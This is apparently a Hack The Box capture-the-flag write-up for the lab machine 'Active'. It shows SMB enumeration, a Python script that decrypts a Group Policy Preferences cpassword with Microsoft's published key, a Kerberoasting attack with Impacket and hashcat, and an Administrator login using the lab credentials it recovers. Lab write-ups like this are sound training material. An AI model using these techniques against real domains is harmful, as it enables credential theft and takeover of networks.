Hack The Box Writeup - Active

Active is an easy Windows box. The main objective of this box is to enumerate and exploit several open ports of the target Domain Controller. First, by enumerating the SMB shares, we were able to obtain an interesting file, which led us to valid credentials of a user. These credentials were then used to perform a Kerberoast attack on the target. This gave us access to another, high privilege user, which we could use to obtain the root flag.

Enumeration

As always, we start by scanning the target machine’s open ports:

rustscan --ulimit 5000 active.htb -- sV -sC -oN nmap_scan

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2022-04-21 14:31:38Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5722/tcp  open  msrpc         syn-ack Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC
49169/tcp open  msrpc         syn-ack Microsoft Windows RPC
49173/tcp open  msrpc         syn-ack Microsoft Windows RPC
49174/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Here we clearly see that the target machine is a Domain Controller for the domain active.htb. Further, the OS of the DC is Windows Server 2008.

SMB - TCP 139/445

A quick SMB enumeration revealed an interesting file called Groups.xml.

┌──(kali㉿kali)-[~/HTB/machines/active]
└─$ smbmap -R -H 10.129.130.10 --depth 10

Interesting snippet of the smbmap output showing an interesting file called Groups.xml.

I downloaded the file to further investigate it on my local machine:

smbmap -H 10.129.130.10 --download 'Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml'

I noticed it contained a userName and a cpassword field. This sounds promising!

<?xml version="1.0" encoding="utf-8"?>   
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
        <Properties 
            action="U" 
            newName="" 
            fullName="" 
            description="" 
            cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" 
            changeLogon="0" 
            noChange="1" 
            neverExpires="1" 
            acctDisabled="0" 
            userName="active.htb\SVC_TGS"
        />
    </User>
</Groups>

Group Policy Preferences

A quick goolge research showed that this is a very common config file for Group Policy Preferences (GPP):

When a new GPP is created, there’s an associated XML file created in SYSVOL with the relevant configuration data and if there is a password provided, it is AES-256 bit encrypted which should be good enough… Except at some point prior to 2012, Microsoft published the AES private key on MSDN which can be used to decrypt the password. Since authenticated users (any domain user or users in a trusted domain) have read access to SYSVOL, anyone in the domain can search the SYSVOL share for XML files containing “cpassword” which is the value that contains the AES encrypted password.
(Source: https://adsecurity.org/?p=2288)

So for whatever reason, Microsoft published the encryption key which is used to AES encrypt the passwords.

This means we could simply write a short script to decrypt the found password ciphertext using the published key:

from Crypto.Cipher import AES
import base64

# determine padding for cpass and base64 decode it
password_hash = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
password_hash += '=' * (4 - len(password_hash) % 4)
decoded = base64.b64decode(password_hash)

# key known due to microsoft docs https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN
secret_key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
iv = '\x00' * 16
aes = AES.new(secret_key, AES.MODE_CBC, iv)
plaintext = aes.decrypt(decoded).decode().strip()

print(f"Plaintext: {plaintext}")

Executing this script, we got the password:

└─$ python3 gpp_decrypt.py
Plaintext: GPPstillStandingStrong2k18

Initial Foothold

Next, we could access the SMB shares using the obtained password:

┌──(kali㉿kali)-[~/HTB/machines/active]
└─$ smbmap -R -H 10.129.130.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

Apparently, the user SVC_TGS has access to a few additional shares including the Users share. This is also where I found the user.txt file.

Snippet of the smbmap output using the found credentials: We now have access to additional SMB shares!

Privilege Escalation

As we had valid credentials for the user SVC_TGS, we were able to proceed with a Kerberoasting attack. This means we used the credentials for the current user to request service tickets from the KDC for existing services. These service tickets are encrypted with the corresponding service’s password hash. We can use this condition to attempt to crack the password of the service on our local machine.

To obtain the Service Tickets, we can use the tool GetUserSPNs which is part of the Impacket collection.

┌──(kali㉿kali)-[~/HTB/machines/active]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.130.10 -request

The tool found a valid service called Administrator which also happens to be a valid user in the domain.

Performing a Kerberoast attack on the domain active.htb using Impacket’s GetUserSPNs.py

Next, we used hashcat to crack the hash. The password was quickly found as it was part of the rockyou.txt wordlist.

Hashcat with the mode 13100 (for krb5tgs) and the wordlist rockyou.txt: Password successfully cracked

Finally, we enumerated the SMB shares once again with the newly obtained credentials. Snippet of the smbmap output using the found Administrator credentials: We now have access to even more SMB Shares!

└─$ smbclient //10.129.130.10/C$ -U active.htb\\administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Proof for rooting the machine